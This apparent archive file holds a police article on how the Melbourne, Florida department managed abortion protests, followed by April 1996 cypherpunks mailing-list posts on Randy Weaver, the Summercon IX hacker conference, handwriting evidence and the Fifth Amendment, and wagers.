The intensity of pro-life and pro-choice sentiments and the
multitude of proponents on either side required the Melbourne
Police Department (MPD) to meet this challenge head on. Yet,
despite hundreds of arrests, lengthy trials, lawsuits, and
attempts by both sides of the issue to challenge the department's
neutrality and professionalism, the MPD continued to maintain a
positive public image, as demonstrated in television coverage,
press reports, and editorials.

The department has learned a great deal since its first encounter
with activism several years ago. Agency administrators have
identified and established methods to address several issues
common to the protests they faced. In many ways, these issues
represent features typical to most contemporary activist
movements, regardless of where they operate or what causes they
support.

NEW CRUSADERS

For the most part, the general public's perception of social
protests has focused on the fringe--a picture of activists as a
few misguided malcontents driven by extreme viewpoints. Images of
barefooted flower children dressed in tie-dyed shirts and old
jeans usually come to mind.

Protesters today are more likely to arrive at the scene
conservatively dressed, some even wearing designer clothes. They
are committed to a cause, but operate from what would appear to
be a less radical position. Whereas the old school proclaimed to
Middle America, "We're different," the activists of the 1990s
claim, "We are Middle America."

Activism, once the domain of extremists, now is viewed as a valid
form of creating social change. Christian activists, in
particular, come from conservative backgrounds and depend on the
belief that most Americans share their   basic values to build
their ranks and project an image of legitimacy onto their
activities. Protesters who once would have been considered
reactionary now may be seen as courageous proponents of a cause.
This change in public perception creates some particular
challenges for law enforcement.

CHALLENGES TO LAW ENFORCEMENT

Intelligence Gathering:

Florida law allows law enforcement to collect and maintain
intelligence on persons and groups if the surveillance is
conducted with "a reasonable, good faith belief that it will lead
to detection of ongoing or reasonably anticipated criminal
activities"1 (emphasis added). Unfortunately, incidents of past
abuse create a negative public perception of police efforts to
gather intelligence information on activist groups.
Nevertheless, the necessity for intelligence gathering cannot be
over emphasized. To cope successfully with a major incident or a
series of announced protests, the police must collect information
about the leaders and members of the sponsoring group(s). The
Melbourne Police Department assigned a full-time de-tective to
intelligence duties with the advent of large-scale abortion
protests. The detective and the department met the challenge of
intelligence gathering in a very direct way.

Every issue has two sides, and law enforcement can use this fact
to its advantage with regard to activist groups. For the MPD,
much of the intelligence information gained on pro-life
organizers came from their opposition. Private investigators
contracted by pro-choice groups tracked, photographed, and
collected data on pro-life activists,   and then offered much of
this in-telligence information to the police department.
By accepting this information, the department could have opened
itself to criticism from the pro-life side. But such protests
have not materialized, largely because pro-life organizations
have their own intelligence groups in operation, gathering
similar data on clinic employees, doctors, and patients.
The police department uses this intelligence information to plan
its response to demonstrations and other protest activities. Much
of the success of this effort can be attributed to the approach
taken by the MPD investigator.

During the first critical months of the intelligence-gathering
initiative, the MPD investigator remained open and approachable
to both sides. After introducing himself to pro-life leaders, he
began to attend their groups' public meetings. Although he
remained steadfastly neutral on the issue of abortion, pro-life
organizers accepted the detective in his official role.
Some of the Christian activists even saw his personal conversion
to the cause as a special challenge. While he may have gained
little critical information from these contacts, the personal
interaction enabled him to provide the department's command staff
with his intuitive assessment of the pro-life leadership. His
close involvement with the groups also minimized the effect of an
anticipated disinformation campaign against the police department
as the protests and demonstrations grew.

In contrast, efforts to infiltrate pro-life groups with
undercover officers produced little benefit. Because of the
successful application of racketeering statutes to their
organizations, pro-life leaders avoided discussing any
law-breaking activity in rallies or other public forums.
Therefore, it became difficult for the police department to
anticipate the number and identities of participants in trespass
and civil disobedience incidents prior to the actual events.
Police staffing for the events became a combination of "best
guess" deci-sionmaking and trial and error.

Staffing and Financial Concerns:

Protests and mass-arrest situations are labor-intensive events
that often require more staff than departments can schedule for
regular duty. Thus, staffing becomes a financial challenge for
any agency faced with such events.

In 1993, the MPD spent $51,000 in overtime for peacekeeping and
enforcement duties. Most communities accept such costs as a
natural consequence of the rights of citizens to engage in
peaceful protests. However, in the abortion-rights battle, public
funds can become a propaganda tool for both sides.

Pro-choice leaders decry the need to devote tax dollars to
protect abortion clinics. They attempt to influence public
opinion by claiming that if not for the antiabortion activity,
police could be out fighting crime. Pro-life leaders attack local
governments, questioning why they spend public funds to protect
clinics that perform abortions.

For law enforcement, the obvious need for overtime staffing does
not justify a carte blanche approach to personnel allocation.
Indeed, agencies should plan their staffing levels carefully.
Overstaffing can be interpreted as overreaction and can erode
public and political support for the police as expenses build. At
the same time, understaffing delays an appropriate response to a
fast-breaking event, opening an agency to accusations of
favoritism and lack of preparation.

The MPD approach uses past experience, current intelligence data,
and consensus building  among the command staff to determine the
department's response on a daily basis. Contingency plans, such
as callout lists and mutual-aid requests, complement the daily
plan and allow for a quick escalation of personnel levels as the
need arises.

Use of Force:

During a demonstration, the   arrest procedures and defensive
tactics employed by police become high-visibility--and
potentially high-liability--issues. The public perceives how well
an agency responds to incidents based on the level and type of
force used in restraining, moving, and arresting nonviolent
protesters.

Antiabortion protesters usually employ passive resistance
techniques when engaged in trespass activities and civil
disobedience. Department administrators decided that officers
should not use take- downs, come-alongs, and pressure point
control techniques in response to the protestors' passive
resistance.

After reviewing news videos, newspaper photographs, and media
accounts, the command staff concluded that these techniques
produced fewer benefits than their associated costs--images of
over-reaction and the appearance of unnecessary cruelty. Thus,
training becomes a focal point for any agency tasked with
responding to such incidents.

Training:

Recognizing the hazards of overreaction, the MPD command staff
developed a thorough training plan, and from the outset,
communicated to officers both the policy and philosophy of the
department's response strategy. Instructors briefed officers on
the respective beliefs and positions of both sides of the
abortion issue and juxtaposed this information with the MPD's
operational plan:

The morality of allowing (abortion) is unquestionably the most
passionate issue of today, and undoubtedly, the personnel of the
Melbourne Police Department hold as varied a collection of
outlooks on the matter as does the general public.
However, our code of ethics requires that we never act
officiously or permit personal feelings, prejudices, animosities
or friendships to influence our decisions and that we will
enforce the law courteously and appropriately, without fear of
aggression.

Professionally, then, we cannot and will not, collectively or
individually, take sides on the issue of whether abortion is
moral or immoral. It is therefore our intention to safeguard the
rights of holders of both convictions to the best of our ability,
by enforcing the law firmly but compassionately, while respecting
the constitutional rights of all persons.2

This foundation set the tone for more specific training in
perimeter security, crowd control, arrest techniques, and booking
procedures. Advised that both sides of the issue often try to
provoke personal responses from police personnel on the scene,
officers were briefed on deflection responses and the importance
of maintaining neutrality. Instruction also included handling
press inquiries, complaints from neighbors adjacent to the
clinic, and comments from passing motorists.

Training also focused on methods of response to a frequent tactic
used by pro-life groups--individuals' and groups' chaining or
locking themselves to doors, fences, and one another to impede
entry into abortion clinics. In these attempts, the protestors
generally use steel bicycle locks or heavy chains. Therefore,
when responding to pro-life demonstrations, the MPD always comes
prepared with a variety of cutting tools, protective shields, and
specially trained personnel.

The emphasis of the department's philosophy and the depth of
officer training paid off when the level of protests increased in
the spring of 1993. An injunction granted in April 1993,
restricting activities within a buffer zone around the abortion
clinic, led to over 140 arrests in the ensuing weeks. During that
time, no arrestees were injured, although one officer received a
back injury while attempting to catch a protestor who suddenly
had gone limp.

Logistics:

Preparation for events likely to result in mass arrests entails
tre-mendous effort. The wide range of potential scenarios forces
agencies to prepare numerous contingencies. In other words, they
must have a plan for personnel and equipment to respond to a
small protest that could easily either expand or fizzle.
Implementing a response plan involves considerable risk,
especially in financial terms. The MPD spent over $7,000 during
the first week of scheduled protests in spring 1993, but made no
arrests. As the protests grew, the need for more flexibility in
response became clear.

The MPD command staff brainstormed the logistical process by
asking a number of questions. What resources are necessary for
the arrest function? How many arrests should be expected? What
are the best- and worst-case arrest scenarios? How many officers
are needed per arrestee? How long should the booking process
take? What special equipment should be on hand--or quickly
available--each day? The command staff compiled the answers to
these questions into an operational plan for the continuing
protests.

The plan outlined job descriptions for all personnel. Many jobs
were combined for small events, but remained separate in the plan
to allow for easy expansion. The plan identified eight command
and logistical positions: Incident commander, field force
commander, tactical commander, arrest processing supervisor,
logistics officer, traffic and security supervisor, supply
officer, and tactical supervisor.

The command staff also compiled a list of equipment that might be
needed during large demonstrations. These items were gathered for
quick issue to officers. Flowcharts and checklists provided
incident commanders with an easy method   to evaluate and control
the police response.

Interagency Coordination:

The police department supplemented its efforts by coordinating
mutual aid with other local and State agencies. An interagency
agreement for mutual aid in emergencies had long been in place.
In addition, the MPD made arrangements with agencies to provide
personnel in the event of a major disturbance. To date, the
police department has not found it necessary to invoke the
agreement.

However, as arrests mounted in the spring of 1993 and beyond,
police coordination with the Brevard County Detention Center
(BCDC) assumed particular importance. Operated by the Brevard
County Sheriff, the BCDC holds over 800 prisoners serving county
jail terms or awaiting trial, sentencing, or transfer to other
institutions. A large-scale protest easily can produce arrest
numbers that equal 10 to 20 percent of the current jail
population.

Many of the tactics employed by activists--such as refusing to
identify themselves upon arrest--are designed specifically to
land them in jail and thus heighten the impact of their protests.
To reduce booking time at the jail, the police de-partment's
command staff developed an on-scene arrest procedure. Police
personnel photographed arrestees (full face, with no hats or
sunglasses) with the arresting officer. Officers then restrained
the arrestees using flex-cuffs marked with indelible ink. This
procedure simplified the paperwork process once the officers had
positively identified the arrestees.

Department administrators also conducted advanced planning with
the county prosecutor's office. With input from police
administrators, the prosecutor's office predetermined appropriate
charges for given actions and prepared sample narratives for
officers that include all elements of each separate offense. For
major events, an assistant State's attorney provides on-scene
legal advice to the incident commander.

Because pro-life groups often allow, and even encourage, children
to engage in protest activities, the police department also
included the Youth Services Division of the Department of Health
and Rehabilitative Services in the planning process. During
demonstrations, this agency assumes responsibility for
safeguarding children who are in custody due to a parent's
arrest. Policymakers decided to take all juvenile violators into
custody, but to file criminal charges only against those 16 or
older. Younger children are transported from the scene and held
until their parents come to get them.

PLANNING FOR PROTESTS:

Communities of all sizes face the potential for demonstrations
and acts of social protest. Even when peaceful, these events
challenge the resources of local law enforcement agencies.
Because demonstrations can escalate quickly into more menacing
assaults against public order, agencies must prepare for a full
range of response options. Agency administrators should use
specific planning methods to determine appropriate responses. In
the face of potential protests and demonstrations, agencies need
to scan, plan, train, respond, and evaluate.

Scan:

Police administrators should scan the environment. Does the
community have protest potential? Are there abortion or family
planning  facilities, nuclear plants, military bases, or defense
contractors in the area? Is economic disparity an issue? Are
there civil rights concerns or racial unrest? What types of
protests have occurred locally and regionally?

Plan:

The size and type of potential protests should dictate the
response. Police administrators should contact their counterparts
in jurisdictions already affected by protests. Law enforcement
agencies must coordinate their planning with related agencies and
offices.

Local law enforcement agencies must predetermine task planning,
personnel allocation, and deployment plans. Adequate supervision
of the field force and booking facilities is essential. Police
administrators also should arrange contingency funding through
the local government if current funds appear insufficient.

Train:

Effective training cannot occur on the day of the event;
personnel must be trained in advance. Agencies should review and
address use-of-force issues related to nonviolent or passive
resistance. Officers should train in arrest, transportation, and
confinement techniques. Administrators should use training
sessions to assess employee readiness, both on emotional and
physical scales.

Respond:

When an event occurs, the established reaction plan should be
implemented in increments, according to need. This measured
reaction will enable the police department to escalate or scale
down its response in a more controlled way.

Incident commanders should scan for new tactics, attitudes, and
actions of all participants. Supervisors should monitor personnel
closely for compliance with established policies. When responding
to volatile situations, officers must avoid the temptation to
become overinvolved or to allow emotion to overtake reason.

Evaluate:

Agencies should conduct after-action debriefings and report their
findings in detailed postincident reports. The reports should
answer basic questions about the police response. Was the plan
effective? If not, why not? How do command officers, supervisors,
and line officers feel about their performances? What needs to be
changed?

The evaluation stage also includes the tabulation of costs.
Agencies should count on various groups--including the press,
politicians, local government administrators, and even the
protesters themselves--to ask how much the police response cost
taxpayers. Of course, each of these groups has different needs
and motives for acquiring this information. No matter how
well-executed its response, the police department should expect
criticism to come from one or more camps.

PREPARING FOR THE NEXT EVENT:

After completing these stages, the agency faces additional tasks.
Scanning, planning, and training for the next potential incident
must begin anew. Unexpected questions should be answered, and old
ones revisited.

Administrators must remember that despite the nonviolent focus of
most social protesters, fringe elements still exist that use
firearms, bombs, and chemical agents to accomplish their goals.
All aspects of the planning process should incorporate a response
strategy for such contingencies.

CONCLUSION:

Social protest--sometimes honorable, sometimes inglorious--has a
long history in the United States. The role of law enforcement is
not to impede legitimate acts of social demonstration but to
enforce court-mandated restrictions and to ensure individual and
community safety. By following a methodical plan and anticipating
problems before they occur, law enforcement can meet the
challenges of contemporary protests successfully.

Endnotes:
1 FLA. STAT. 119.011, d. 2.
2 Melbourne, Florida, Police Department Abortion Protest
Operational Plan, January 1993, 1.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 23 Apr 1996 19:02:15 +0800
To: tallpaul@pipeline.com
Subject: Re: Nazis on the Net
Message-ID: <01I3V1T4ISI88Y4Z9L@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: tallpaul@pipeline.com (tallpaul)

>Since E.A. Smith wants completeness re the Zundelsite issue, I am curious
>about his assertion about Weaver. 
 
>Might we know the source of his complete info on Weaver's political and
>racial beliefs. 
 
>I see, in essence, three hypothesis: 
 
>1) Cover the ass of a potential neo-Nazi or racist (or both) without any
>reference to what is really true; 
 
>2) Get information from outer space; 
 
>3) Base the conclusion on hard evidence. 
 
>If the answer is 3) I'd like to get a real pointer to the real evidence. By
>real evidence I mean just that, not wishful thinking or advertising jingles
>for points 1) or 2). 

	Hmm... good question. I've seen various quotes from Randy Weaver in
various publications, including Time and other non-right-wing ones. None of
them indicated him as an actual neo-Nazi or racist, even in the stories (such
as in Time) which appeared to assume that militia member = neo-Nazi (quite
incorrect, from what I know of the subject. For instance, the most
anti-government of the gun-rights organizations, which appears to have quite a
few militia members, is Jews for Firearms Ownership. The founders of the
organization in question believe that gun rights are necessary to prevent
another Holocaust. Other gun-rights political organizations concentrate on
self-defense from non-governmental criminals). I don't know when I'll have
the time to check on the matter. 
 
>PS: Cypherpunks seems to be getting very wiggy these days.

	Most mailing lists do on a regular basis... my (passing) scans of the
archives indicate that cypherpunks is prone to this.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 23 Apr 1996 19:57:23 +0800
To: jamesd@echeque.com
Subject: Re: Nazis on the Net
Message-ID: <01I3V3793L1W8Y4Z9L@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jamesd@echeque.com" 23-APR-1996 01:23:34.90

>(Note for the seriously humor impaired.  I have no more reason
>to believe that tallpaul rapes little children than tallpaul 
>has to believe that Randy Weaver was a white supremacist or 
>tallpaul has to believe that Allen Smith is a Nazi sympathizer.)

	Thank you for your support (although I am not named Bartles or James),
but I don't _think_ that tallpaul was calling me a Nazi sympathizer. Doing so
would be thoroughly inaccurate, and would be contradicted by my previous
statements re: Nazi Germany (one reason for Hiroshima and Nagasaki being right
was the Japanese alliance with Germany) and the Holocaust (people who claim
it didn't happen are calling my paternal grandfather a liar).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scon@2600.com (Summercon Organizers)
Date: Tue, 23 Apr 1996 18:50:17 +0800
To: cypherpunks@toad.com
Subject: ANNOUNCE: Summercon IX
Message-ID: <199604230622.CAA07772@phalse.2600.com>
MIME-Version: 1.0
Content-Type: text/plain


      Phrack Magazine and Cult of the Dead Cow proudly present:

                  The 1996 Summer Security Conference

sSSSS  U    U  M     M  M     M   EEEEE   RRRR     CCCC   OOOO    N   N
S      U    U  MM   MM  MM   MM   E       R   R   C      O    O   NN  N
sSSSs  U    U  M M M M  M M M M   EEE     RRRR    C      O    O   N N N
    S  U    U  M  M  M  M  M  M   E       R  R    C      O    O   N  NN
SSSSs   UUUU   M     M  M     M   EEEEE   R   R    CCCC   OOOO    N   N

                            IIIII XX    XX 
                             III   XX  XX  
                             III    XXXX   
                             III   XX  XX  
                            IIIII XX    XX 

                            "SUMMERCON IX"

			   June 15th, 1996

			Georgetown Holiday Inn
			   Washington D.C.


This is the official announcement and open invitation to the 1996
incarnation of Summercon.  In the past, Summercon was an invite-only
hacker gathering held annually in St. Louis, Missouri. Starting in
1995, SummerCon became an open event to any and all interested
parties:  Hackers, Phreaks, Pirates, Virus Writers, System Administrators,
Law Enforcement Officials, Vigilantes, Neo-Hippies, Secret Agents, Teachers,
Disgruntled Employees, Telco Flunkies, Journalists, New Yorkers, Programmers, 
Conspiracy Nuts, Musicians, Nudists, and Rug Sucking Wannabes.

LOCATION:

The Georgetown Holiday Inn
2101 Wisconsin Ave. NW
Washington, DC

The hotel is located in scenic Georgetown, close to the Mall
and the Smithsonian Museums as well as all the major tourist
attractions in D.C... 

Georgetown itself is a major tourist area, with many fine shops,
restaurants, PUBS and NIGHTCLUBS located there. If you can't
figure out anything to do here, you need to get a life pretty badly.


DIRECTIONS:

from I66 coming east:
Just keep going east. Take the Key Bridge exit off of 66,
the bridge will be a left at the 3rd light after you take
the exit. It's hard to miss, keep left and you will be forced
over the bridge pretty much. On the other side of the bridge,
take a right on M street (right and left being the ONLY choices
possible.) keep right on the bridge and you will again be forced
onto M street. Go down M and take a left at the second or third
light. Go up 2-3 blocks and take a right (either or), and
proceed to Wisconsin Ave. Take a left on Wisconsin. There is NO
left turn from M st. onto Wisconsin, thus the diverse route.
(Hey welcome to DC, run by the U.S. Congress and Mayor Barely.)
(You will soon discover the same logic that brought you the CDA.)

>From MD and 95 North:
Take 95 south to 495 towards Northern Virginia.
Take the George Washington Parkway South to Key Bridge.
Follow I66 East directions above rest of the way from Key bridge.

>From VA and 95 South:
Get on 395 North, follow signs to National Airport.  At National Airport,
turn around and follow directions from National Airport.
(this will keep you from getting LOST, just do it)

>From National Airport:
Tell the cabbie to take you to the hotel. OR
Take George Washington Parkway to the Key Bridge / Rosslyn Exit. 
Follow I66 East directions from above from Key Bridge.

>From Dulles Airport:
Tell the cabbie to take you to the hotel. OR
Take the Dulles Access road back southeast away from the Airport.
This will dump you out on I66 eastbound. (See above) If you are trying 
to get TO Dulles, take I66 westbound and get in the right hand lane 
after the Sycamore St. exit, and veer to the right to take the next
exit to the airport. Get in the left hand lane, and stay there to
avoid being on the toll road. There is a parallel road that leads
to the airport, but it's a local toll highway, stay left and avoid
giving Virginia money unnecessarily.

Taxis:
The average airport fare runs around $20 from national, to $30 for
Dulles.  Your mileage may vary however with local road conditions. 


CONFERENCE INFO:

It has always been our contention that cons are for socializing.
"Seekret Hacker InPh0" is never really discussed except in private
circles, so the only way anyone is going to get any is to meet new people
and take the initiative to start interesting conversations.

Because of this, the formal speaking portion of Summercon will be
held on one day, not two or three, leaving plenty of time for people
to explore the city, compare hacking techniques, or go trashing and
clubbing with their heretofore unseen online companions.

If you are coming from out of town and want the full hacker/tourist
experience, we will informally meet in the lobby of the Georgetown
Holiday Inn Friday, June 14th, 1996, at 2pm.  From there we will
have an informal hacker sight-seeing tour of DC, including the FBI
headquarters and other interesting (and legal) places to go.

The sight-seeing will converge with DC locals and mall security at 
2600 in Pentagon City Mall Friday, June 14th, 1996, at 6pm.  Although
this isn't the first Friday of the month, this is definitely an official
2600 meeting, and likely to be the biggest one ever.  This informal
meeting will be held until about 8pm.

The formal conference will be held on Saturday, June 15th, 1996, from
10am to 6pm (with a break for lunch).  There will be a variety of speakers,
panel discussions, demonstrations, and other events guaranteed to keep 
everyone entertained.  

No video or audio tapes will be allowed in the conference room. 
No still photography will be permitted in the conference room without
prior permission of all those being photographed.  Violation of these 
policies will result in you being asked to leave the conference.

There will be no selling of t-shirts, disks, firewalls, payphones, etc.
in or around the conference area without prior permission of the organizers.
If you are interested in demoing or selling something, please contact us
at the address listed at the bottom.  


SPEAKERS:

The speakers list for Summercon IX is still being finalized, but it is sure
to be even more dynamic and interesting than previous years.  Speakers at
Summercon '95 included such people as ex-CIA agent Robert Steele, author
Winn Shwartau, Cypherpunk founder Eric Hughes, movie producer Annaliza Savage,
and network security expert Bob Stratton.


If you are an expert in some aspect of computer, network, or telco security
and are interested in speaking at Summercon, please contact us to discuss
the possibility further at the address listed at the end of this document.

We are also going to be having short speeches by real hackers or phreakers
giving their own perspective on some issue or insight into a new technology.
This is an open invitation for you hackers to be heard; just provide us with
a brief outline of the topic you will be covering and the amount of time you
will take (suggested: 5 - 15 minutes) at the address listed below.  


COSTS:

Costs for SummerCon IX are as follows:

      Secret Service / FBI Rate: $500.00
Government / Institutional Rate: $ 80.00
       Hacker / Individual Rate: $ 20.00 


Members of the United States Secret Service or Federal Bureau of 
Investigations, and anyone that has in the past or currently is providing
information or services to the Secret Service or FBI are required to pay
the 'Secret Service / FBI Rate'.  

Employees of a local, state, or federal government, members and associates
of any L.E.O., and employees of any corporation working in the area of
computer security must pay the 'Government / Institutional Rate'.

Anyone that does not fit into one of the above categories is eligible for
the 'Individual / Hacker Rate'.

Due to historical lack of interest, there will not be pre-registration
for the conference.  Registration will begin at 9am the day of the
conference, and will continue for the duration of the conference or until
the meeting facilities have reached their capacity.  Since the latter
is likely to occur, it is suggested you don't oversleep.

No purchase orders, checks, money orders, foreign currency, stock certificates,
IOUs, or coins will be accepted for registration.  Secret Service agents,
small unmarked bills only, please.

Sorry for this being a bit more expensive than last year for the hackers, 
DC seems to be a more expensive place to hold a conference and the expenses
are several times what they were in Atlanta.

Bring money for t-shirts, they are cool!


HOTEL INFORMATION:

Georgetown Holiday Inn
2102 Wisconsin Ave NW
Washington, DC

Phone Number: (202) 338-4600

The cost for a double occupancy room at the Georgetown Holiday Inn is $99.
There is no special conference rate, there is no need to mention you are
with a conference at all, the people in reservations probably won't know
what you are talking about anyhow.  The $99 rate is however a a special
rate being held by Holiday Inn, so don't be afraid to tell them so if they
try to quote you a higher rate.

If the hotel is damaged in any manner, you are going to pay for it, and you
will probably end up in jail.  And even if you are lucky enough to get away
with it, the rest of the hackers staying at the hotel will end up paying for
it, and I'm sure that's going to make you a well-liked and respected hacker,
especially among some of the bigger hackers who might feel tempted to inflict
bodily harm on someone who causes any damage to the hotel.  Please act
responsibly, don't drink and drive, chew all your food before you swallow,
don't swallow your gum, and recycle.


CONTACTING SUMMERCON ORGANIZERS:

You can contact the Summercon organizers through e-mail.  If you haven't
figured out e-mail yet, you probably shouldn't be coming to Summercon.

As a final note, if you are planning on coming to Summercon, we would
appreciate you sending e-mail to us with the subject of "GOING TO SCON"
or something similar, just so that we have a rough idea of how many
people are going to show up.


    E-mail:     scon@2600.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-


 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Tue, 23 Apr 1996 20:23:07 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: 5th protect password?
In-Reply-To: <m0uBZkb-000986C@pacifier.com>
Message-ID: <Pine.3.89.9604230552.A27763-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


	Jim:

On Mon, 22 Apr 1996, jim bell wrote:

> >> The point is that the demanding of handwriting samples is a fairly new 
> >> What do you want to bet that it first occurred in this century?
> >	For questioned document examination?   Sometime during the
> >	sixties.  
> >	For graphological examination?  Hasn't occurred yet.  
> 
> Tell this to Unicorn.  He seems to disagree, although he hasn't
> cited specifics yet.

	I was only thinking in terms of US Courts.

	Black Unicorn didn't limit himself to that.
	His citations are early than 1900.  
	Think Ecclesiastical Courts.   Or use Lexis.

> >	Can you provide a citation where a 
>>      court has demanded a handwriting
> >	sample for graphological purposes?
> 
> Adding the conditional "for graphological purposes," I can't. 

	Why doesn't that surprise me?   You raised the conditional
	"for graphological purposes".   

> I was merely 
> referring to a SC decision previously quoted here.  The writing of that 
> reference didn't make clear what purposes the sample could be used for.

	I guess you didn't read any of the SC decision.  It was
	only for Questioned Document Examination.   

> No.  What I was trying to do is to get people to stop thinking of legal 
> precedent as being some sort of end-all incident that makes all further 
> discussion pointless.  

	So you totally ignore what was practiced.  Thus creating
	hypothetical situations that could never have occured.

> >	Note in passing that rules for admitting something into 
> >	evidence was a lot looser then, than it is now. 
> If that's really the case, and this would today be considered a 
> clear violation of the 5th, what does that say about the claim that 

	I guess you are not familiar with the _current_ requirements 
	for one to be qualified as an expert witness in court.

	Or studied _Federal Rules for Evidence_.   

	Or faced a hostile attorney whose sole intent is to 
	totally discredit you, because the facts don't support 
	the client's allegations.  

> "current government policy" must be right?

	Given a choice between being able to prove my innocence,
	based on scientifically demonstrable facts, or on the
	heresay of unsubstantiated opinion, I'd rather use the
	scientific facts, anytime.  

	And as you've been told, the items you gave in your list
	were for identification of an individual. 

        xan

        jonathon
        grafolog@netcom.com




**********************************************************************
*								     *
*	Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*	ftp://ftp.netcom.com/pub/gr/graphology/home.html	     *
*								     *
*			     OR					     *
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 24 Apr 1996 02:09:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: 5th protect password?
In-Reply-To: <m0uBZkb-000986C@pacifier.com>
Message-ID: <Pine.SUN.3.91.960423061250.9587A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 22 Apr 1996, jim bell wrote:

> Tell this [statement about the use of handwriting analysis in
> court] to Unicorn.  He seems to disagree, although he hasn't
> cited specifics yet. 

Correct me if I'm wrong, but didn't Unicorn offer Mr. Bell a 
wager on this issue?  Isn't the ball in Mr. Bell's court to put
his money where his mouth is?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Wed, 24 Apr 1996 01:58:32 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: EFF member discount @ Forum on Information Security, Apr. 29
In-Reply-To: <199604230438.VAA04546@toad.com>
Message-ID: <v03006605ada289afe287@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:38 pm  -0700 4/22/96, John Gilmore wrote:

>7:45 p.m.   James Freeman, Special Agent in Charge, FBI
>	(Federal Bureau of Investigation), San Francisco Office
>	The Threat and Reality of Industrial Espionage in the Bay Area

That reminds me: I believe Jim Freeman is the FBI-SAiC who supervised the
local UNABOM case investigations. This could be an explosively interesting
evening, (metaphorically speaking _only_, Officer Friendly!). See you there.

   dave

______________________________________________________________________
"I _do_ speak for my employer: _I_ founded the whole %*&#ing company!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Wed, 24 Apr 1996 03:38:18 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: Nazis on the Net
Message-ID: <2.2.32.19960423143032.00690690@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:26 PM 4/22/96 -0700, Rich Graves wrote:
>E. Allen Smith actually might have written:
>
>>I've seen various quotes from Randy Weaver in various publications,
>>including Time and other non-right-wing ones. None of them indicated him
>>as an actual neo-Nazi or racist
>
>BWAHAHAHA!!!

This is from the DOJ report on the Ruby Ridge shooting:

"Weaver first came to the attention of the BATF in July 1986 during its
investigation of a series of bombings in Coer d'Alene, Idaho in which the
Aryan Nations was believed to be involved. BATF asked Kenneth Fadeley, a
confidential informant, to assist its investigation by obtaining information
about people attending an upcoming World Aryan Congress who might be engaged
in illegal activities.[FN23] Thereafter, Fadeley portrayed himself as a
weapons dealer who catered to motorcycle gangs and, in this role, managed to
be introduced to high level members of the Aryan Nations in Northern
Idaho.[FN24]

In July, 1986, Fadeley attended the World Aryan Congress at Hayden Lake,
Idaho. During this assembly, Fadeley was introduced to Weaver, who was at
that time of no particular investigative significance to BATF.[FN25]"

Weaver may have just been attending the World Aryan Nations Congress for the
beer and chicks...

Portions of the report are online at
http://isdn33.eng.uc.edu/~rabagley/ruby/ruby.toc.html



Rich



______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Wed, 24 Apr 1996 04:37:30 +0800
To: Sandy Sandfort <jimbell@pacifier.com>
Subject: Re: 5th protect password?
Message-ID: <199604231456.HAA06590@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:19 AM 4/23/96 -0700, Sandy Sandfort wrote:
> didn't Unicorn offer Mr. Bell a 
> wager on this issue?  Isn't the ball in Mr. Bell's court to put
> his money where his mouth is?

Yeah:  fifty thousand dollars.  
Not that it makes the slightest difference.

On the extropians list a number of very large bets were made and 
accepted, but nobody ever paid up. (Or very few -- I know of no
cases.)

When somebody proposes a bet that is substantially larger than
the likely cost to his reputation if he weasels out, one can
expect that, if he erred, he will not pay.

Now if Unicorn had proposed a bet for one hundred dollars, then
I would sit up and take notice.  A hundred dollars is real money.  
Fifty thousand dollars is hot air, like one kid says, "I bet you 
I am right", and the other kid says "I bet you a zillion 
dollars you are wrong".

If somebody proposes a bet that is larger than the likely 
reputation cost of weaseling, we should ignore the bet 
and subtract from the guys reputation as if he had already 
weaseled, since the events of the extropian list show that 
that is the most likely outcome.

All of us have been wrong from time to time on matters where we
were sure we were right.  Anybody who was serious about paying
would not make such ridiculous bets.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
